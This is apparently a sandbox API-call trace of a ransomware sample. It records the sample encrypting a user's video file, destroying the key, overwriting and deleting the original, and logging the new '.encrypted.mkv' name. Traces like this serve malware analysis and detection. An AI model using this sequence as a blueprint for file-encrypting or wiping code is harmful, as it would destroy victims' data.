CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.409] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9439e8*, pdwDataLen=0x6ae220*=0xe9d3, dwBufLen=0xe9e0 | out: pbData=0x9439e8*, pdwDataLen=0x6ae220*=0xe9e0) returned 1 [0043.409] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0043.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.409] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.409] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.416] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0043.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.416] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.417] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.417] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0043.417] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0043.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.417] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.417] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.417] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0043.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.417] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.417] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0043.418] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0043.418] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0043.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0043.418] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.418] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0043.418] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.418] FreeLibrary (hLibModule=0x754b0000) returned 1 [0043.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0043.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0043.419] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0043.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0043.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.419] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd7aab80, ftCreationTime.dwHighDateTime=0x1d5bbb4, ftLastAccessTime.dwLowDateTime=0xb609cf10, ftLastAccessTime.dwHighDateTime=0x1d5ba6f, ftLastWriteTime.dwLowDateTime=0xb609cf10, ftLastWriteTime.dwHighDateTime=0x1d5ba6f, nFileSizeHigh=0x0, nFileSizeLow=0xe9d3, dwReserved0=0x0, dwReserved1=0x777648, cFileName="9QOf4ezMoY.mkv", cAlternateFileName="9QOF4E~1.MKV")) returned 0x7c2100 [0043.419] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0043.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0043.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0043.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.420] CharLowerBuffW (in: lpsz="byte[59859]", cchLength=0xb | out: lpsz="byte[59859]") returned 0xb [0043.420] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0043.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.420] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0043.420] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0043.420] FreeLibrary (hLibModule=0x76b40000) returned 1 [0043.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0043.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0043.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0043.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0043.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0043.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0043.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0043.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0043.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0043.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0043.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0043.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0043.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0043.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0043.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0043.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0043.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0043.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0043.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0043.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0043.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.421] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0043.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0043.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.421] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0043.421] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.421] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\9qof4ezmoy.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0043.421] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0043.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0043.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0043.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0043.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0043.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0043.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0043.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0043.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0043.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0043.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0043.422] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0043.422] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.422] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.422] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.422] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0043.422] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.423] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.423] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.423] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv", lpFilePart=0x0) returned 0x47 [0043.423] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd7aab80, ftCreationTime.dwHighDateTime=0x1d5bbb4, ftLastAccessTime.dwLowDateTime=0xb609cf10, ftLastAccessTime.dwHighDateTime=0x1d5ba6f, ftLastWriteTime.dwLowDateTime=0x1997f880, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xe9d3, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="9QOf4ezMoY.mkv", cAlternateFileName="9QOF4E~1.MKV")) returned 0x7c2100 [0043.423] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\9qof4ezmoy.mkv")) returned 1 [0043.424] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd7aab80, ftCreationTime.dwHighDateTime=0x1d5bbb4, ftLastAccessTime.dwLowDateTime=0xb609cf10, ftLastAccessTime.dwHighDateTime=0x1d5ba6f, ftLastWriteTime.dwLowDateTime=0x1997f880, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xe9d3, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="9QOf4ezMoY.mkv", cAlternateFileName="9QOF4E~1.MKV")) returned 0 [0043.424] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0043.425] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.426] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0043.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0043.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0043.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0043.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0043.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0043.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0043.427] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0043.427] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0043.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.427] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0043.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.427] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0043.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0043.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.427] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0043.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0043.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.427] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0043.428] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0043.428] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.428] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0043.428] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.428] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0043.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0043.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.429] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0043.429] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x37d1, lpOverlapped=0x0) returned 1 [0043.430] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0043.430] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x37d1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.430] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0043.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0043.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0043.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.encrypted.mkv\r\n", cchWideChar=84, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 84 [0043.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x54) returned 0x794b90 [0043.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.encrypted.mkv\r\n", cchWideChar=84, lpMultiByteStr=0x794b90, cbMultiByte=84, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.encrypted.mkv\r\n", lpUsedDefaultChar=0x0) returned 84 [0043.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0043.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0043.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0043.430] WriteFile (in: hFile=0x140, lpBuffer=0x87a9d8*, nNumberOfBytesToWrite=0x53, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87a9d8*, lpNumberOfBytesWritten=0x6aee3c*=0x53, lpOverlapped=0x0) returned 1 [0043.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0043.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.438] CloseHandle (hObject=0x140) returned 1 [0043.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0043.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0043.440] HeapFree 